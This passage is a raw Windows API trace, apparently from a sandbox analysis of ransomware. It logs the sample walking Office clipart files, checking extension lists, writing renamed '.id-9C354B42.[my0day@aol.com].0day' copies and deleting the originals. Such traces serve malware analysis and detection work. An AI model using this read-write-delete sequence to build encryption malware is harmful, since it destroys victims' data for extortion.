Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.490] lstrlenW (lpString=".1cd") returned 4 [0272.490] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0272.491] lstrlenW (lpString=".jpg") returned 4 [0272.491] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.491] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.491] lstrlenW (lpString="DD00255_.WMF") returned 12 [0272.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.516] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2690) returned 1 [0272.516] CloseHandle (hObject=0x3a8) returned 1 [0272.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 0x20 [0272.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0272.591] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.591] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.592] GetLastError () returned 0x0 [0272.592] ReadFile (in: hFile=0x3a0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xa82, lpOverlapped=0x0) returned 1 [0272.596] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xa90, lpOverlapped=0x0) returned 1 [0272.597] ReadFile (in: hFile=0x3a0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.597] WriteFile (in: hFile=0x318, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.598] SetEndOfFile (hFile=0x318) returned 1 [0272.598] CloseHandle (hObject=0x318) returned 1 [0272.598] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.598] SetEndOfFile (hFile=0x3a0) returned 1 [0272.600] CloseHandle (hObject=0x3a0) returned 1 [0272.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0272.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.638] lstrlenW (lpString=".doc") returned 4 [0272.638] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.638] lstrlenW (lpString=".docx") returned 5 [0272.638] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.638] lstrlenW (lpString=".pdf") returned 4 [0272.638] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.638] lstrlenW (lpString=".xls") returned 4 [0272.638] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.638] lstrlenW (lpString=".xlsx") returned 5 [0272.638] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.638] lstrlenW (lpString=".ppt") returned 4 [0272.638] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.638] lstrlenW (lpString=".zip") returned 4 [0272.638] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.638] lstrlenW (lpString=".rar") returned 4 [0272.638] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.638] lstrlenW (lpString=".bz2") returned 4 [0272.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString=".7z") returned 3 [0272.639] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString=".dbf") returned 4 [0272.639] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString=".1cd") returned 4 [0272.639] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString=".jpg") returned 4 [0272.639] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString=".doc") returned 4 [0272.639] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString=".docx") returned 5 [0272.639] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.639] lstrlenW (lpString=".pdf") returned 4 [0272.639] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString=".xls") returned 4 [0272.639] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.639] lstrlenW (lpString=".xlsx") returned 5 [0272.639] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.639] lstrlenW (lpString=".ppt") returned 4 [0272.639] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.639] lstrlenW (lpString=".zip") returned 4 [0272.639] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.639] lstrlenW (lpString=".rar") returned 4 [0272.639] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString=".bz2") returned 4 [0272.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.639] lstrlenW (lpString=".7z") returned 3 [0272.640] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.640] lstrlenW (lpString=".dbf") returned 4 [0272.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.640] lstrlenW (lpString=".1cd") returned 4 [0272.640] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0272.640] lstrlenW (lpString=".jpg") returned 4 [0272.640] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.640] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.640] lstrlenW (lpString="DD00405_.WMF") returned 12 [0272.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.645] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=17584) returned 1 [0272.645] CloseHandle (hObject=0x390) returned 1 [0272.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 0x20 [0272.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.645] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.645] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.645] GetLastError () returned 0x0 [0272.646] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x44b0, lpOverlapped=0x0) returned 1 [0272.648] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x44c0, lpOverlapped=0x0) returned 1 [0272.649] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.649] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.649] SetEndOfFile (hFile=0x39c) returned 1 [0272.649] CloseHandle (hObject=0x39c) returned 1 [0272.649] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.649] SetEndOfFile (hFile=0x390) returned 1 [0272.652] CloseHandle (hObject=0x390) returned 1 [0272.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString=".doc") returned 4 [0272.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString=".docx") returned 5 [0272.653] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.653] lstrlenW (lpString=".pdf") returned 4 [0272.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString=".xls") returned 4 [0272.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.653] lstrlenW (lpString=".xlsx") returned 5 [0272.653] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.653] lstrlenW (lpString=".ppt") returned 4 [0272.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString=".zip") returned 4 [0272.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.653] lstrlenW (lpString=".rar") returned 4 [0272.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString=".bz2") returned 4 [0272.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString=".7z") returned 3 [0272.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString=".dbf") returned 4 [0272.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString=".1cd") returned 4 [0272.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.653] lstrlenW (lpString=".jpg") returned 4 [0272.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString=".doc") returned 4 [0272.654] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString=".docx") returned 5 [0272.654] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.654] lstrlenW (lpString=".pdf") returned 4 [0272.654] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString=".xls") returned 4 [0272.654] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.654] lstrlenW (lpString=".xlsx") returned 5 [0272.654] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.654] lstrlenW (lpString=".ppt") returned 4 [0272.654] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString=".zip") returned 4 [0272.654] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.654] lstrlenW (lpString=".rar") returned 4 [0272.654] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString=".bz2") returned 4 [0272.654] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString=".7z") returned 3 [0272.654] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString=".dbf") returned 4 [0272.654] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString=".1cd") returned 4 [0272.654] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0272.654] lstrlenW (lpString=".jpg") returned 4 [0272.654] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.655] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.655] lstrlenW (lpString="DD00407_.WMF") returned 12 [0272.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.655] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=7828) returned 1 [0272.655] CloseHandle (hObject=0x390) returned 1 [0272.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 0x20 [0272.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.655] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.655] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.656] GetLastError () returned 0x0 [0272.656] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x1e94, lpOverlapped=0x0) returned 1 [0272.658] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x1ea0, lpOverlapped=0x0) returned 1 [0272.659] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.659] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.659] SetEndOfFile (hFile=0x39c) returned 1 [0272.659] CloseHandle (hObject=0x39c) returned 1 [0272.659] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.659] SetEndOfFile (hFile=0x390) returned 1 [0272.662] CloseHandle (hObject=0x390) returned 1 [0272.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0272.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.787] lstrlenW (lpString=".doc") returned 4 [0272.787] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.787] lstrlenW (lpString=".docx") returned 5 [0272.787] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.787] lstrlenW (lpString=".pdf") returned 4 [0272.787] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.787] lstrlenW (lpString=".xls") returned 4 [0272.787] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.787] lstrlenW (lpString=".xlsx") returned 5 [0272.787] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.787] lstrlenW (lpString=".ppt") returned 4 [0272.787] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.787] lstrlenW (lpString=".zip") returned 4 [0272.787] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.787] lstrlenW (lpString=".rar") returned 4 [0272.787] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.787] lstrlenW (lpString=".bz2") returned 4 [0272.787] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.787] lstrlenW (lpString=".7z") returned 3 [0272.788] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString=".dbf") returned 4 [0272.788] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString=".1cd") returned 4 [0272.788] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString=".jpg") returned 4 [0272.788] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString=".doc") returned 4 [0272.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString=".docx") returned 5 [0272.788] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.788] lstrlenW (lpString=".pdf") returned 4 [0272.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString=".xls") returned 4 [0272.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.788] lstrlenW (lpString=".xlsx") returned 5 [0272.788] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.788] lstrlenW (lpString=".ppt") returned 4 [0272.788] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.788] lstrlenW (lpString=".zip") returned 4 [0272.788] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.788] lstrlenW (lpString=".rar") returned 4 [0272.788] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString=".bz2") returned 4 [0272.788] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.788] lstrlenW (lpString=".7z") returned 3 [0272.788] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.789] lstrlenW (lpString=".dbf") returned 4 [0272.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.789] lstrlenW (lpString=".1cd") returned 4 [0272.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0272.789] lstrlenW (lpString=".jpg") returned 4 [0272.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.789] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.789] lstrlenW (lpString="DD00413_.WMF") returned 12 [0272.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 